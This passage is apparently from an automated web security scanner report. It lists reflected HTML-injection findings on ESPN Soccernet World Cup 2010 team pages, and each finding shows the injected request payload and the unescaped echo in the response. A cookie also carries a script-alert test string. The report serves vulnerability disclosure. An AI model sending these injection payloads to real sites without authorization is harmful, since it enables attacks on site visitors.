Last-Modified: Sat, 06 Nov 2010 23:23:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:28:26 GMT
Content-Length: 81713
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Portugal Football /
...[SNIP]...
<a href="/worldcup2010/team?team=482&c9668"><a>dbe5bd058c5=1&_slug_=portugal&c9668">
...[SNIP]...

5.105. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/4860/north-korea

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94792"><a>24dd3ae9355 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/4860/north-korea94792"><a>24dd3ae9355 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:05 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 23:33:05 GMT
Content-Length: 81813
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4860&_slug_=north-korea94792"><a>24dd3ae9355&topId=803573&linktext=North+Korea+coach+proud+of+players">
...[SNIP]...

5.106. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/4860/north-korea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85746"><a>c9e9c662c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/4860/north-korea?85746"><a>c9e9c662c34=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:23:57 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:23:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:28:57 GMT
Content-Length: 81921
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4860&85746"><a>c9e9c662c34=1&_slug_=north-korea&85746">
...[SNIP]...

5.107. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/624/algeria

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced83"><a>be36cbbeb72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/624/algeriaced83"><a>be36cbbeb72 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:10 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:13:10 GMT
Content-Length: 81717
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Algeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=624&_slug_=algeriaced83"><a>be36cbbeb72&topId=795940&linktext=Saifi+accused+of+slapping+journalist">
...[SNIP]...

5.108. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/624/algeria

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><a>1a4281499ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/624/algeria?9d7f4"><a>1a4281499ae=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:12:07 GMT
Content-Length: 81825
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Algeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=624&9d7f4"><a>1a4281499ae=1&_slug_=algeria&9d7f4">
...[SNIP]...

5.109. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/627/japan

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74e2"><a>61cba004527 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/627/japanf74e2"><a>61cba004527 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:19:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:19:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:24:24 GMT
Content-Length: 81475
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Japan Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=627&_slug_=japanf74e2"><a>61cba004527&topId=804089&linktext=Japan+search+for+new+boss">
...[SNIP]...

5.110. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/627/japan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f5b1"><a>ddd77a815e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/627/japan?7f5b1"><a>ddd77a815e5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:15:11 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:15:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:20:11 GMT
Content-Length: 81583
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Japan Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=627&7f5b1"><a>ddd77a815e5=1&_slug_=japan&7f5b1">
...[SNIP]...

5.111. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/628/australia

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c26"><a>970c5e66c8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/628/australia91c26"><a>970c5e66c8e HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:13:55 GMT
Content-Length: 82012
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Australia Football
...[SNIP]...
<a href="/worldcup2010/team?team=628&_slug_=australia91c26"><a>970c5e66c8e&topId=792986&linktext=Striker+hits+out+over+coach%27s+tactics">
...[SNIP]...

5.112. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/628/australia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41f3"><a>62eb963c13c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/628/australia?f41f3"><a>62eb963c13c=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
